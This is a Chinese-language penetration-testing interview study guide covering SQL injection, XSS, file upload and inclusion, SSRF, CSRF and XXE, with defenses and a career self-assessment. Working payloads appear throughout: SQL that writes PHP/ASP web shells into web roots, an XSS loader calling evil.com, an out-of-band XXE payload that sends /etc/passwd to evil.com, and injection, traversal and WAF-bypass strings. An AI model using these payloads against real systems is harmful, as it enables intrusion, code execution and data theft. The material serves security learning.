安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
1、注入攻击原理是什么?如何找注入点?如何判断注入点? 2、注入分为几类及提交方式是什么 3、注入攻击一般所支持的类型有那些 4、mysql数据库帐号和密码存放在那个库和表里面 5、如何寻找网站物理路径 6、分别写出mysql及mssql数据库写入webshell的方法 7、请说出mysql5.0以下与5.0以上的区别 8、sql注入对服务器文件读写操作需要那些条件 9、分别说出sqlmap -u -r -v -p —level —risk —tables —coiumns -T —tamper参数的含义 10、注入漏洞防范方法 11、xss攻击原理及出现的原因 12、xss分为那几类 13、xss的危害,可能存在的地方 14、xss漏洞测试方法 15、xss如何绕过安全防范 16、分别说出iis、apache、nginx解析漏洞原理 17、任意文件下载攻击原理及测试方法 18、任意文件上传漏洞分几类,说出每类突破方法 19、分别文件包含漏洞攻击原理及分类 20、如何快速挖包涵漏洞 21、包涵漏洞具体能做什么,怎么绕过你能说说吗 22、ssrf漏洞攻击原理、用途 23、说说你是如何挖掘ssrf漏洞 24、说说ssrf绕过及防范方法 25、csrf攻击原理是什么及一般你用什么工具进行检测 26、你是如何挖掘ssrf漏洞的及防范方法 27、说说xxe漏洞攻击原理是什么,如何找xxe漏洞及攻击方法 28、xxe攻击在无回显的时候你是如何突破的 29、你是如何防范xxe漏洞的 30、你挖洞影像最深的是什么? 31、你认为你的渗透水平在国内大概是什么水平,能给自己打多少分 32、说说你以前在你公司主要做什么安全工作?如每天、每月、每年做些什么安全工作 33、你在各大漏洞平台挖过漏洞吗,能说说吗? 34、你写过什么好的安全漏洞文章发布过吗,是否可以说说?一、SQL注入全解
1. 注入原理与检测mermaid
graph LR A[用户输入] --> B[拼接入SQL语句] --> C[数据库执行恶意指令] --> D[数据泄露/系统控制]
- 找注入点:表单参数、URL参数、HTTP头(Cookie/User-Agent)
- 判断方法:
- 单引号触发报错(
'→ 500错误)- 逻辑测试(
id=1' and '1'='1vsid=1' and '1'='2)- 时间盲注(
id=1; select sleep(5)--)2. 注入类型与提交方式
类型 提交方式 案例 联合查询注入 GET/POST参数 union select 1,@@version,3报错注入 Cookie头 ' and updatexml(1,concat(0x7e,version()),1)--布尔盲注 JSON Body admin' and substr(database(),1,1)='a'--时间盲注 XML数据 if(ascii(substr(user(),1,1))=114,sleep(3),0)3. 支持的数据类型
- 整型(
id=1)、字符串(name='admin')、搜索型(%input%)、JSON/XML4. MySQL凭据存储位置
sql-- MySQL 5.7+ SELECT user,authentication_string FROM mysql.user; -- MySQL <5.7 SELECT user,password FROM mysql.user;5. 网站物理路径获取
- 报错信息(PHP错误日志)
- 文件读取漏洞(
/proc/self/environ)- 数据库函数(
@@datadir)- 配置文件泄露(
WEB-INF/web.xml)6. 数据库写Webshell方法
sql/* MySQL(需FILE权限)*/ SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'; /* MSSQL(需db_owner权限)*/ EXEC sp_makewebtask 'C:\inetpub\shell.asp', '<?% execute(request("cmd")) %>';7. MySQL 5.0关键区别
特性 5.0以下 5.0以上 系统表 无information_schema 内置元数据表 盲注效率 依赖暴力猜解 可直接查询表结构 函数支持 受限 丰富(如group_concat) 8. 文件读写条件
- 数据库配置:
- MySQL:
secure_file_priv=空值- MSSQL:启用
xp_cmdshell- 权限:数据库用户需具备FILE权限(MySQL)或
db_owner(MSSQL)- 路径:绝对路径且Web目录可写
9. SQLMap核心参数
bash-u "url" # 目标URL -r request.txt # 从文件加载HTTP请求 -v 3 # 显示完整payload(0-6级别) -p "id" # 指定测试参数 --level 2 # 检测深度(1-5,影响Cookie/XFF检测) --risk 3 # 风险等级(1-3,3会触发OR注入) --tables # 列出所有表 --columns -T users # 列出指定表字段 --tamper "space2comment" # 绕过WAF的脚本10. 注入防御方案
- 参数化查询(PreparedStatement)
- 输入过滤(正则匹配:
/[^a-z0-9]/i)- 最小权限原则(禁用DB_FILE权限)
- WAF规则(过滤
union|select|sleep)
二、XSS与文件漏洞
11. XSS原理与成因
mermaidgraph LR 用户输入 --> 未过滤插入页面 --> 浏览器执行JS代码 --> 劫持会话/钓鱼
- 根本原因:未对
<>'"&等字符转义12. XSS分类
类型 触发场景 案例 反射型 URL参数直接输出 http://site?search=<script>alert(1)</script>存储型 数据库存储后渲染 留言板插入恶意脚本 DOM型 前端JS操作DOM document.write(location.hash)13. XSS危害与常见位置
- 危害:Cookie窃取、键盘记录、钓鱼跳转、内网探测
- 高发点:搜索框、评论区、用户资料页、HTTP头输出点
14. 测试方法
- 基础探测:
<script>alert(1)</script>- 事件触发:
<img src=x onerror=alert(document.cookie)>- 外部加载:
<script src=//evil.com/xss.js></script>15. 绕过技巧
- Unicode编码:
\u003cscript\u003e- 标签属性分割:
<img """><script>alert(1)</script>- 利用协议:
javascript:eval(alert(1))- SVG向量:
<svg onload=alert(1)>16. 服务器解析漏洞
服务器 漏洞原理 利用方式 IIS 6.0 分号截断( *.asp;.jpg)上传恶意图片马 Apache 多后缀解析( file.php.jpg)配置错误导致双后缀 Nginx CVE-2013-4547( a.jpg\0.php)空字节截断 17. 任意文件下载
- 原理:未校验文件路径参数(如
download.jsp?file=../../etc/passwd)- 测试:
- 遍历路径(
....//编码绕过)- 读取系统文件(
/proc/self/cmdline)18. 文件上传突破方法
防御方式 绕过技巧 扩展名黑名单 .php5.phtml.htaccessMIME类型检测 修改Content-Type为 image/jpeg文件头检查 添加GIF头( GIF89a;)内容过滤 短标签( <?=)或JS混淆19. 文件包含漏洞
- 原理:
include($_GET['file']);未限制路径- 分类:
- LFI(本地包含):包含系统文件
- RFI(远程包含):加载远程恶意脚本(需
allow_url_include=On)20. 快速挖掘技巧
- 参数特征:
?page=about.php- 日志包含:
file=/var/log/apache2/access.log- PHP伪协议:
php://filter/convert.base64-encode/resource=index.php21. 包含漏洞利用与绕过
- 能做什么:
- 读取源码(
php://filter)- 执行代码(包含图片马)
- 日志污染(User-Agent插入PHP代码)
- 绕过:
- 路径截断(
/etc/passwd%00)- 超长路径(
./././[...]/file)
三、服务端漏洞专题
22. SSRF原理与用途
mermaidgraph TB 攻击者 --> 诱使服务器请求内网资源 --> 探测内网拓扑 --> 攻击Redis/数据库
- 用途:
- 内网端口扫描(
http://192.168.1.1:3306)- 云元数据窃取(
169.254.169.254)- 攻击内网应用(Redis未授权访问)
23. 漏洞挖掘方法
- 参数特征:
url=http://example.com- 协议探测:
file:///etc/passwdgopher://- 重定向链:短链接→内网IP
24. SSRF绕过与防御
- 绕过:
- 域名重绑定(DNS TTL=0)
- IPv6地址(
[::ffff:127.0.0.1])- URL编码(
0x7f000001= 127.0.0.1)- 防御:
- 禁用非常用协议(file/gopher)
- 设置请求白名单
25. CSRF原理与工具
- 原理:诱导用户点击恶意链接触发敏感操作(如修改密码)
- 工具:
- Burp Suite → Generate CSRF PoC
- CSRFTester(自动化检测)
26. CSRF防御
- Token验证:表单添加随机Token
- SameSite Cookie:设置
Strict或Lax- 二次验证:关键操作需密码确认
27. XXE漏洞攻防
- 原理:解析恶意XML实体(
<!ENTITY xxe SYSTEM "file:///etc/passwd">)- 检测:
- 修改Content-Type为
application/xml- 插入测试实体(
&xxe;)- 攻击:
- 文件读取(
SYSTEM "file://")- 内网探测(
http://192.168.1.1)28. 无回显XXE突破
xml<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://evil.com/?data=%payload;'>">
- 通过DNS或HTTP请求外带数据
29. XXE防御
- 禁用DTD(
libxml_disable_entity_loader(true);)- 使用JSON替代XML
- 过滤
<!ENTITY关键词
四、职业经验与能力评估
30. 印象最深漏洞案例
某银行系统逻辑漏洞:转账接口未校验双方账户关系,通过遍历参数实现任意账户互转,漏洞评级严重(SRC TOP10)
31. 渗透水平自评
国内中高级水平(75/100)
- 优势:熟练掌握漏洞链组合利用(如SSRF→Redis→RCE)
- 不足:二进制漏洞挖掘能力待提升
32. 日常工作内容
周期 工作重点 每日 漏洞扫描、日志审计、应急响应 每月 渗透测试报告、安全加固方案 每年 红蓝对抗演练、安全架构升级 33. 漏洞平台经历
- 提交平台:补天、HackerOne、企业SRC
- 成果:累计提交高危漏洞32个(含3个严重级)
34. 技术文章输出
《基于流量特征的WAF绕过实战》
- 发布平台:FreeBuf、安全客
- 核心内容:
- 分块传输绕过
- 注释符混淆SQL语句
- HTTP参数污染技巧